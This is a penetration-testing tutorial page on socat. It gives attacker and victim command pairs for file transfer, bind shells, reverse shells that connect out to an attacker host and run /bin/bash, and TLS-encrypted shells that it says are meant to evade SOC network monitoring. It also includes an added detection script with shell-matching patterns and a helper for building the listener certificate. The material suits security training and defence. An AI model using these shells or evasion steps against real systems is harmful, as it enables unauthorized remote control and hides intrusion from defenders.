
Socat

The name is short for SOcket CAT.


Last updated 11 months ago

SOCAT

  • Connecting To a TCP/UDP Port

Attacker Machine

socat - TCP4:<IP>:<PORT>

- ⇒ stdio (standard input and output): what you type is sent to the socket, and what the socket sends is printed

  • Listening On a TCP/UDP Port

Victim Machine

socat TCP4-LISTEN:<PORT> stdout
  • Transfer File With Socat

Attacker Machine

socat  TCP4:<IP>:<PORT> file:sec.txt,create
  • socat: This is the command itself, which stands for "SOcket CAT". It is a multipurpose relay tool that can create two bidirectional byte streams and transfer data between them.

  • TCP4: This specifies the address type and protocol to be used. TCP4 indicates that the connection will use the IPv4 protocol with TCP.

  • <IP>: This is a placeholder for the IP address of the remote host to which you want to connect.

  • <PORT>: This is a placeholder for the port number on the remote host to which you want to connect.

  • file:sec.txt: This specifies the second address as a file. The data received from the TCP connection is written to (or read from) this file. Here, sec.txt is the filename.

  • create: This option ensures that the file sec.txt is created if it does not already exist. Without this option, if the file does not exist, the command would fail.

Victim Machine

socat TCP4-LISTEN:<PORT>,fork file:sec.txt 
  • socat: This is the command itself, which stands for "SOcket CAT". It is a utility for data transfer between two bidirectional data streams.

  • TCP4-LISTEN:<PORT>: This specifies that socat should listen for incoming TCP connections on the specified port (replace <PORT> with the actual port number you want to use).

  • fork: This option tells socat to fork (create a new process) for each incoming connection. This allows socat to handle multiple connections simultaneously.

  • file:sec.txt: This specifies that the data received from each connection should be written to the file sec.txt.

The advantage of socat with fork is that more than one client can connect to the same port at the same time, each served by its own process, and the listener keeps running instead of closing after the first connection, which is what distinguishes it from nc.

You Can Use Standard Input/Output And Redirection

Victim Machine

socat tcp-listen:4444,fork - < sec.txt

- ⇒ use standard input/output; after this, socat waits for input

< ⇒ shell redirection; feeds the contents of the file as that input

Attacker Machine

socat tcp4:192.168.43.1:4444 - > sec.txt

- ⇒ use standard input/output; after this, socat waits for input

> ⇒ shell redirection; stores the received data in the file (overwriting it). Use >> instead if you want to append to the file and keep its old contents

  • Socat Bind

Attacker Machine

socat  -d -d -d - TCP4:<IP>:<PORT>

Victim Machine

socat -d -d -d tcp4-listen:<PORT>,fork exec:/bin/bash
  • socat: The command-line utility for bidirectional data transfer between two independent data channels.

  • -d -d -d: These flags enable different levels of debugging output. Each -d increases the verbosity of the debug information.

  • tcp4-listen:<PORT>: This option tells socat to listen for incoming TCP connections on the specified port (<PORT>). The tcp4 part specifies that only IPv4 connections are accepted.

  • fork: This option tells socat to fork a new process for each incoming connection. This allows multiple clients to connect simultaneously, each handled by its own process.

  • exec:/bin/bash: This part of the command specifies that when a connection is established, socat should execute /bin/bash. This effectively provides a shell to the connected client.

Socat Reverse Shells

Attacker Machine

socat -d -d -v tcp4-listen:<PORT> -

-v ⇒ also prints the transferred data to stderr; - ⇒ stdio, so the commands you type are sent to the remote shell and its output is printed

Victim Machine

socat -d -d TCP4:<IP>:<PORT>,fork exec:/bin/bash
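As an added example that is not part of the original notes: a POSIX shell script that classifies socat command lines the way a defender reviewing process listings would, into bind or reverse shell relays and plaintext or TLS channels, using the EXEC:/SYSTEM: and *-listen: address forms shown in the bind and reverse shell commands above. The process lines, user names, PIDs and addresses in SAMPLE_PS are constructed for the example, and the shell-detection patterns are a heuristic to extend for your environment.

```shell
#!/bin/sh
# Added example, not part of the original notes: classify socat command lines
# the way a defender would when reviewing process listings from a host.
# The sample process lines in SAMPLE_PS are constructed for this example.

# Print a label for a socat command line and return 0 if it exposes a shell:
#   bind-shell      listener that executes a shell for whoever connects
#   reverse-shell   outbound connection that executes a shell for the peer
# followed by the channel: plaintext, tls, or tls-noverify (verify=0).
# Prints "none" and returns 1 for anything else.
classify_socat() {
    lc=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')

    case "$lc" in
        *socat*) ;;
        *) echo none; return 1 ;;
    esac

    # Does one address execute a shell? Heuristic on common EXEC:/SYSTEM:
    # targets; extend the list for your environment.
    case "$lc" in
        *exec:*bash*|*exec:*/sh*|*exec:sh*|*exec:\'sh*|*exec:*zsh*|*exec:*dash*| \
        *exec:*cmd*|*exec:*powershell*|*system:*sh*) ;;
        *) echo none; return 1 ;;
    esac

    # Direction: a *-listen: (or *-l:) address waits for a peer (bind shell);
    # a plain tcp4:/tcp:/openssl: address dials out (reverse shell).
    case "$lc" in
        *-listen:*|*-l:*) kind=bind-shell ;;
        *) kind=reverse-shell ;;
    esac

    # Channel: openssl addresses carry TLS; verify=0 means no peer authentication.
    case "$lc" in
        *openssl*verify=0*) chan=tls-noverify ;;
        *openssl*) chan=tls ;;
        *) chan=plaintext ;;
    esac

    echo "$kind $chan"
    return 0
}

# Read "pid user cmdline..." lines on stdin and print the flagged ones
# as "pid user label".
scan_process_lines() {
    while IFS= read -r line; do
        pid=${line%% *}
        rest=${line#* }
        user=${rest%% *}
        cmd=${rest#* }
        if label=$(classify_socat "$cmd"); then
            printf '%s %s %s\n' "$pid" "$user" "$label"
        fi
    done
}

# Count lines on stdin (avoids wc's leading spaces on some systems).
count_lines() {
    n=0
    while IFS= read -r line; do n=$((n + 1)); done
    echo "$n"
}

# Constructed sample process listing (pid user cmdline), not real data.
SAMPLE_PS='1201 www-data socat -d -d -d tcp4-listen:4444,fork exec:/bin/bash
1202 bob socat -d -d TCP4:203.0.113.10:4444,fork exec:/bin/bash
1203 root socat -d -d -v openssl-listen:6666,cert=bind.pem,fork,verify=0 exec:/bin/bash
1204 alice socat TCP4-LISTEN:9000,fork file:sec.txt
1205 root /usr/sbin/sshd -D'

if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_PS" | scan_process_lines
fi
```

Run with `--demo` to see the three flagged lines from the sample; in practice feed it `ps -eo pid,user,args --no-headers` output (a constructed assumption about your collection source) and alert on any bind-shell or reverse-shell label, treating tls-noverify as the encrypted variant described later on this page.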

Socat Encrypted Bind Shell

In normal use the tool sends everything in plaintext. Anyone monitoring the communications, such as a SOC team watching the network, sees exactly which commands you run on the server or against victims inside the network, so you are easily detected and the analysts know exactly what you did.

Let's see this using Wireshark:

ip.addr == 192.168.43.1 && tcp

Here I use a filter that keeps only this host's TCP packets, because the capture contains many connections using several different protocols, which is normal on a network.

--

As you can see, as soon as the ls command was typed, the packets of the connection started to appear.

--

If you notice some strange characters, they are the escape sequences the terminal uses for colours and formatting: the colour of file names and of directories, and line breaks to display the rest of the files.

As you can see, this behaviour is plainly visible to anyone monitoring what is happening on the network.

--

To hide this, we encrypt all communication between us and the other device, using a key and certificate we create ourselves.

  • Generate key.pem and cert.pem

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365

req ⇒ Use OpenSSL's req subcommand, which creates and processes certificate requests.

-x509 ⇒ Output a self-signed X.509 certificate, the common format for digital certificates, instead of a certificate request.

-newkey rsa:4096 ⇒ Generate a new RSA key pair with a length of 4096 bits. The private and public key are created in this step.

-keyout ⇒ The file in which the private key is saved; here, key.pem.

-out ⇒ The file in which the certificate is saved; here, cert.pem.

-days ⇒ The validity period of the certificate after issuance; here it is valid for one year (365 days).

--

Attacker

socat - openssl:<IP>:<PORT>,verify=0

Victim

socat -d -d -v openssl-listen:6666,cert=bind.pem,fork,verify=0 exec:/bin/bash

bind.pem ⇒ key.pem followed by cert.pem in a single file: socat's cert= option loads both the certificate and the private key from the file it is given.

verify=0 ⇒ neither end checks the other's certificate, so the traffic is encrypted but nobody is authenticated; anyone who can reach the port is handed the shell.
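Added example, not from the original notes, in the same shell the commands above are typed into. It builds the bind.pem that the openssl-listen command expects and checks it before the listener is started: socat's cert= option loads both the certificate and the private key from the one file, and openssl req protects key.pem with a passphrase unless -nodes (or -noenc on OpenSSL 3) is given, which would make socat stop and prompt for the PEM pass phrase. The helper names and the placeholder PEM bodies written by write_demo_pems are constructed for the example so it runs without openssl; they are not real key material.

```shell
#!/bin/sh
# Added example, not from the original notes. socat's cert= option reads both
# the certificate and the private key from the one file it is given (unless
# key= names the key separately), so bind.pem has to be key.pem followed by
# cert.pem. These helpers build that file and check it before the listener is
# started. The PEM bodies written by write_demo_pems are constructed
# placeholders so the script runs without openssl; they are not real keys.

# Count the PEM blocks whose header ends in the given label
# ("PRIVATE KEY" also matches "RSA PRIVATE KEY" and "EC PRIVATE KEY").
pem_block_count() {
    file=$1; label=$2
    [ -r "$file" ] || { echo 0; return; }
    grep -c -e "-----BEGIN .*$label-----" "$file" || true
}

# True if the private key is passphrase-protected: socat would then stop and
# prompt for the PEM pass phrase, which is fatal for an unattended listener.
pem_key_encrypted() {
    [ -r "$1" ] || return 1
    grep -q -e '-----BEGIN ENCRYPTED PRIVATE KEY-----' -e 'Proc-Type: 4,ENCRYPTED' "$1"
}

# True if the file is usable as cert=: a certificate plus an unencrypted key.
bind_pem_ok() {
    [ "$(pem_block_count "$1" 'CERTIFICATE')" -ge 1 ] &&
    [ "$(pem_block_count "$1" 'PRIVATE KEY')" -ge 1 ] &&
    ! pem_key_encrypted "$1"
}

# Build $out from key + cert, refusing to write a file that would not load.
make_bind_pem() {
    key=$1; cert=$2; out=$3
    if [ "$(pem_block_count "$key" 'PRIVATE KEY')" -lt 1 ]; then
        echo "make_bind_pem: no private key block in $key" >&2; return 1
    fi
    if pem_key_encrypted "$key"; then
        echo "make_bind_pem: $key is passphrase-protected" >&2; return 1
    fi
    if [ "$(pem_block_count "$cert" 'CERTIFICATE')" -lt 1 ]; then
        echo "make_bind_pem: no certificate block in $cert" >&2; return 1
    fi
    cat "$key" "$cert" > "$out" && chmod 600 "$out"   # the file now holds the private key
}

# Constructed placeholder PEM files (not real key material) for the demo/test:
# a usable key, a certificate, and a passphrase-protected key to be rejected.
write_demo_pems() {
    dir=$1
    printf '%s\n' '-----BEGIN PRIVATE KEY-----' 'cGxhY2Vob2xkZXIga2V5' '-----END PRIVATE KEY-----' > "$dir/key.pem"
    printf '%s\n' '-----BEGIN CERTIFICATE-----' 'cGxhY2Vob2xkZXIgY2VydA==' '-----END CERTIFICATE-----' > "$dir/cert.pem"
    printf '%s\n' '-----BEGIN ENCRYPTED PRIVATE KEY-----' 'cGxhY2Vob2xkZXI=' '-----END ENCRYPTED PRIVATE KEY-----' > "$dir/enc.pem"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d)
    write_demo_pems "$d"
    if make_bind_pem "$d/key.pem" "$d/cert.pem" "$d/bind.pem" && bind_pem_ok "$d/bind.pem"; then
        echo "bind.pem ready: $(pem_block_count "$d/bind.pem" CERTIFICATE) cert, $(pem_block_count "$d/bind.pem" 'PRIVATE KEY') key"
    fi
    rm -rf "$d"
fi
```

With real files, call `make_bind_pem key.pem cert.pem bind.pem` after the openssl req command and only start the openssl-listen once `bind_pem_ok bind.pem` succeeds; the alternative, also supported by socat, is to keep the files separate and pass `cert=cert.pem,key=key.pem`.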

Wireshark

With the same filter, the payload now appears only as TLS application data: the commands and their output are encrypted with OpenSSL and are no longer readable.

Socat VS Netcat

Summary Table

| Feature             | Netcat (nc)            | Socat                                  |
| ------------------- | ---------------------- | -------------------------------------- |
| Protocol Support    | TCP, UDP               | TCP, UDP, SCTP, UNIX sockets, and more |
| Ease of Use         | Simple, easy to use    | More complex, steeper learning curve   |
| Functionality       | Basic networking tasks | Advanced networking capabilities       |
| Port Scanning       | Yes                    | No                                     |
| Data Transformation | No                     | Yes                                    |
| Proxying/Relaying   | Basic                  | Advanced                               |
| Debugging           | Basic                  | Detailed                               |
| File Transfer       | Yes                    | Yes                                    |

Conclusion

  • Use netcat for simpler, quick networking tasks such as port scanning, basic data transfer, and simple shell setups.

  • Use socat when you need advanced capabilities such as data transformation, complex proxying, and handling multiple types of sockets and protocols.

Choose the tool based on the complexity of the task and the level of control you need over the network connections and data streams.

Reverse shell VS Bind

Summary Table

| Feature               | Reverse Shell                         | Bind Shell                                  |
| --------------------- | ------------------------------------- | ------------------------------------------- |
| Connection Initiator  | Target                                | Attacker                                    |
| Firewall/NAT Evasion  | Easier                                | Harder                                      |
| Setup Complexity      | More complex on target side           | Simpler on target side                      |
| Detection Risk        | Moderate (outbound connection)        | Higher (listening port)                     |
| Use Case              | When outbound connections are allowed | When the attacker can't receive connections |

Conclusion

  • Reverse Shell is generally more flexible in bypassing network restrictions.

  • Bind Shell can be simpler but is more likely to be blocked by network defenses.

  • Choose the method based on the network environment and specific constraints you are working with. Always ensure you have authorization and understand the legal implications of using these techniques.

[Image captions from the original page: Online Reverse Shell; Socat from WSL Ubuntu connected to Termux; Fingerprint; Wireshark: Right Click > Follow > TCP Stream, or Ctrl + Alt + Shift + T; PEM]